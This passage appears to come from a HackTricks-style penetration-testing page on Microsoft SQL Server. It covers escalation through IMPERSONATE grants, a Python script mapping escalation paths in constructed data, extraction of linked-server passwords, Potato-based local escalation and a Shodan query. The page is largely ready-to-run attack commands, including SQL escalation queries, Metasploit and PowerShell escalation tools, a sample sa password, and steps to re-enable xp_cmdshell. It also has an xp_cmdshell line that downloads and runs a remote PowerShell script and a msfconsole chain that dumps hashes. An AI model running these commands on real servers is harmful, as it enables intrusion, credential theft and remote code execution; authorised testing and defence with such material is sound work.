### Impersonation of other users

SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends.

```sql
-- Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
-- Check if the user "sa" or any other high privileged user is mentioned

-- Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

-- If you can't find any users, make sure to check for links
enum_links
-- If there is a link of interest, re-run the above steps on each link
use_link [NAME]
```

> **Tip:** if you can impersonate a user, even if he isn't sysadmin, you should check if the user has access to other databases or linked servers.

Note that once you are sysadmin you can impersonate any other user:

```sql
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the RegUser login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT
```

You can perform this attack with a metasploit module:

```bash
msf> auxiliary/admin/mssql/mssql_escalate_execute_as
```

Or with a PS script:

```powershell
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .\Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!
```
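The two escalation paths in this section (db_owner of a TRUSTWORTHY database owned by a sysadmin, and IMPERSONATE grants, including the tip that an impersonated non-sysadmin may in turn hold the interesting rights) compose: a login that can impersonate another login inherits that login's db_owner memberships and its own IMPERSONATE grants. The script below is an added example, not part of the original page or of the referenced PowerShell modules: it takes rows shaped like the output of the catalog queries shown above and walks the IMPERSONATE graph to report every non-sysadmin login with a path to sysadmin. All rows (database names, owners, logins, grants) are constructed for the example; the grant tuples are modelled as (grantee, impersonatable login).

```python
"""Map MSSQL privilege-escalation paths from catalog data.

The rows below stand in for the output of the queries shown in this section
(sys.databases owner and is_trustworthy_on, sp_helpsrvrolemember 'sysadmin',
sys.database_role_members for db_owner, and IMPERSONATE grants from
sys.server_permissions). They are constructed for this example."""
from collections import defaultdict

# (database name, owner login, is_trustworthy_on)
DATABASES = [
    ("master", "sa", False),
    ("HRApp", "sa", True),               # TRUSTWORTHY and owned by a sysadmin
    ("Reports", "report_owner", True),   # TRUSTWORTHY but the owner is not a sysadmin
    ("Sandbox", "sa", False),
]
SYSADMINS = {"sa", "DOMAIN\\dba"}
# db_owner members per database ("dbo" is the owner's own mapping)
DB_OWNERS = {
    "HRApp": {"dbo", "webapp"},
    "Reports": {"dbo", "analyst"},
    "Sandbox": {"dbo", "dev"},
}
# IMPERSONATE grants as (grantee login, login that may be impersonated)
IMPERSONATE_GRANTS = [
    ("webapp", "sa"),
    ("analyst", "webapp"),
    ("dev", "report_owner"),
    ("DOMAIN\\dba", "sa"),
]


def reachable_logins(grants, start):
    """Logins whose context `start` can adopt through chains of IMPERSONATE grants."""
    edges = defaultdict(set)
    for grantee, target in grants:
        edges[grantee].add(target)
    seen, stack = {start}, [start]
    while stack:
        for nxt in edges[stack.pop()]:
            if nxt not in seen:
                seen.add(nxt)
                stack.append(nxt)
    return seen


def escalation_paths(databases, sysadmins, db_owners, grants):
    """Return {login: [reason, ...]} for non-sysadmin logins that can reach sysadmin."""
    principals = {g for g, _ in grants} | {m for ms in db_owners.values() for m in ms}
    findings = defaultdict(list)
    for login in sorted(principals - sysadmins - {"dbo"}):
        for ident in sorted(reachable_logins(grants, login)):
            via = "" if ident == login else f" (after impersonating {ident})"
            if ident in sysadmins:
                findings[login].append(f"IMPERSONATE chain reaches sysadmin login {ident}")
            for name, owner, trustworthy in databases:
                # db_owner of a TRUSTWORTHY database owned by a sysadmin: a procedure
                # created WITH EXECUTE AS OWNER runs with sysadmin rights.
                if trustworthy and owner in sysadmins and ident in db_owners.get(name, ()):
                    findings[login].append(
                        f"db_owner of TRUSTWORTHY database {name} owned by sysadmin {owner}{via}")
    return dict(findings)


if __name__ == "__main__":
    for login, reasons in escalation_paths(DATABASES, SYSADMINS, DB_OWNERS, IMPERSONATE_GRANTS).items():
        print(login)
        for reason in reasons:
            print("  -", reason)
```

In the constructed data `analyst` never appears in a sysadmin-owned database and holds no grant on `sa`, yet is reported because impersonating `webapp` gives it both. Setting `TRUSTWORTHY OFF` on HRApp (or re-owning it to a non-sysadmin login) removes the db_owner path but leaves the IMPERSONATE chain, which is why the two fixes have to be applied independently.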
## Using MSSQL for Persistence

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
## Extracting passwords from SQL Server Linked Servers

An attacker can extract SQL Server Linked Servers passwords from the SQL Instances and get them in clear text, granting the attacker credentials that can be used to acquire a greater foothold on the target. The script to extract and decrypt the passwords stored for the Linked Servers can be found here.

Some requirements and configurations must be done in order for this exploit to work. First of all, you must have Administrator rights on the machine, or the ability to manage the SQL Server Configurations.

After validating your permissions, you need to configure three things, which are the following:

- Enable TCP/IP on the SQL Server instances;
- Add a Start Up parameter, in this case, a trace flag will be added, which is -T7806.
- Enable remote admin connection.

To automate these configurations, this repository has the needed scripts. Besides having a powershell script for each step of the configuration, the repository also has a full script which combines the configuration scripts and the extraction and decryption of the passwords.

For further information, refer to the following links regarding this attack: Decrypting MSSQL Database Link Server Passwords

Troubleshooting the SQL Server Dedicated Administrator Connection

## Local Privilege Escalation

The user running MSSQL server will have the privilege token SeImpersonatePrivilege enabled.
You probably will be able to escalate to Administrator following one of these 2 pages:

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
## Shodan

```
port:1433 !HTTP
```
## References

- Unit 42 – Phantom Taurus: WMI-driven direct SQL collection via batch/sqlcmd
- https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users
- https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/
- https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/
- https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/
## HackTricks Automatic Commands

```yaml
Protocol_Name: MSSQL #Protocol Abbreviation if there is one.
Port_Number: 1433 #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for MSSQL
  Note: |
    Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).

    #sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
    ###the goal is to get xp_cmdshell working###
    1. try and see if it works
    xp_cmdshell `whoami`
    go

    2. try to turn component back on
    EXEC SP_CONFIGURE 'xp_cmdshell' , 1
    reconfigure
    go
    xp_cmdshell `whoami`
    go

    3. 'advanced' turn it back on
    EXEC SP_CONFIGURE 'show advanced options', 1
    reconfigure
    go
    EXEC SP_CONFIGURE 'xp_cmdshell' , 1
    reconfigure
    go
    xp_cmdshell 'whoami'
    go

    xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"

    https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html

Entry_2:
  Name: Nmap for SQL
  Description: Nmap with SQL Scripts
  Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}

Entry_3:
  Name: MSSQL consoleless msf enumeration
  Description: MSSQL enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'
```